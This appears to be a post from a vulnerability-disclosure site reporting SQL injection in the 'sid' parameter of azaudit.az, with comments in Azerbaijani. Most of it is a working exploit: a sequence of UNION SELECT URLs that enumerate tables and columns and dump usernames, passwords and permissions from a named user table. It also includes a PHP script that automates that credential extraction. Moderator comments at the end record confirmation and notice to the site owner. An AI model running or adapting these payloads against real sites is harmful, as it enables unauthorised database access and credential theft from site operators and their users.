Azaudit.az sid paramert Sql Injection

Azaudit.az 20 June 2016, 03:14

Detailed information

http://www.azaudit.az/?l=az&sid=18' # Sql Vunl
http://www.azaudit.az/?l=az&sid=-18' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- -' # Column Sayi 11 dir
http://www.azaudit.az/?l=az&sid=-18' UNION SELECT 1,2,3,4,5,6,7,8,9,10,version(),12,13-- -' # version <5, Lakin Table_name leri cekende 11-den tableden deyil table_nameleri 1-den cekir.Ona gore 11-e null deyeri vererek group_concat(table_name) emrini 1-e veririk
http://www.azaudit.az/?sid=-18%27 UNION SELECT group_concat(table_name),2,3,4,5,6,7,8,9,10,null,12,13 from information_schema.tables where table_schema=database()--+-'&l=az # Bir basha ekrana hec bir deyer gelmiyecek Ekranda Biraz ortda Services — About linkleri var , About linkinin ustune getirerek HTML kodlarda table_name leri gormek olar
http://www.azaudit.az/?sid=-18%27%20UNION%20SELECT%20group_concat%28column_name%29,2,3,4,5,6,7,8,9,10,null,12,13%20from%20information_schema.columns%20where%20table_name=0x617a615f6d655f7573657273--+-%27 # Yuxarkidaki Kimi Linkin Ustune gelerek veya HTML kodlarda lazim olan setiri taparag column_name leri gormek olar
Son Olaraq
http://www.azaudit.az/?l=az&sid=-18%27%20UNION%20SELECT%20group_concat%28username,0x3a,password,0x3a,permissions%29,2,3,4,5,6,7,8,9,10,group_concat%28username,0x3a,password,0x3a,permissions%29,12,13%20from%20aza_me_users--%20-%27 # Username Password ve Permission columnlarindaki datalari gormek ucun
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Cox Ezitey Olmasin Deye Php de bir bawa table_name-leri column_name-leri ve username ve passwordu ekrana cixaran script yazdim onnan istifade ederek html kodlara baxmadan gore bilersiniz
################



<?php
/*
Coded By Marshall
21.06.2016 03:15
*/

$table = file_get_contents("http://www.azaudit.az/?sid=-18%27%20UNION%20SELECT%20group_concat%28table_name%29,2,3,4,5,6,7,8,9,10,null,12,13%20from%20information_schema.tables%20where%20table_schema=database%28%29--+-%27&l=az");
$column = @file_get_contents("http://www.azaudit.az/?sid=-18%27%20UNION%20SELECT%20group_concat%28column_name%29,2,3,4,5,6,7,8,9,10,null,12,13%20from%20information_schema.columns%20where%20table_name=0x617a615f6d655f7573657273--+-%27");
$sayt = file_get_contents("http://www.azaudit.az/?l=az&sid=-18%27%20UNION%20SELECT%20group_concat%28username,0x3a,password,0x3a,permissions%29,2,3,4,5,6,7,8,9,10,group_concat%28username,0x3a,password,0x3a,permissions%29,12,13%20from%20aza_me_users--%20-%27");
##################################################################
preg_match_all("@<a href='(.*?)'>@si" ,$sayt,$salam);
$exp_1 = explode("<a href='?sid=",$salam[0][28]);// Html Taglari Ayirmagcun
$login = explode(":", $exp_1[1]);
##################################################################
##################################################################
preg_match_all("@<a href='(.*?)'>@si" ,$table,$salam);
$exp_1 = explode("<a href='?sid=",$salam[0][28]);// Html Taglari Ayirmagcun
$names1 = explode(",", $exp_1[1]);
$tables = explode("&", $names1[8]);
##################################################################
preg_match_all("@<a href='(.*?)'>@si" ,$column,$salam);
$exp_1 = explode("<a href='?sid=",$salam[0][28]);// Html Taglari Ayirmagcun
$names = explode(",", $exp_1[1]);
$columns = explode("&", $names[3]);
#################################################################
echo "<h4><font color='red'>Table_Name</font></h4><br>";
echo "1: ".$names1[0]."<br>";
echo "2: ".$names1[1]."<br>";
echo "3: ".$names1[2]."<br>";
echo "4: ".$names1[3]."<br>";
echo "5: ".$names1[4]."<br>";
echo "6: ".$names1[5]."<br>";
echo "7: ".$names1[6]."<br>";
echo "8: ".$tables[0]."<br><hr/>";
#################################################################
echo "<h4><font color='red'>Column_Name</font></h4><br>";
echo "1: ".$names[0]."<br>";
echo "2: ".$names[1]."<br>";
echo "3: ".$names[2]."<br>";
echo "4: ".$columns[0]."<br><hr/>";
#################################################################
echo "<h4>Username : <font color='red'>".$login[0]."</font></h4><br>";
echo "<h4>Password : <font color='red'>".$login[1]."</font></h4><br>";

?>


#################

Comments

  • 21 October 2016, 13:51
    Vulnerability status
    Have not any information from source

  • 22 August 2016, 09:58
    Vulnerability status
    Sended e-mail to source about vulnerability

  • 21 June 2016, 13:43
    Added point to Vulnerability
    Moderator gave 8 point from 10 to vulnerability

  • 21 June 2016, 13:43
    Vulnerability status
    Confirmed by Moderator

  • 20 June 2016, 03:14
    Vulnerability added
    Vulnerability added to BUGemot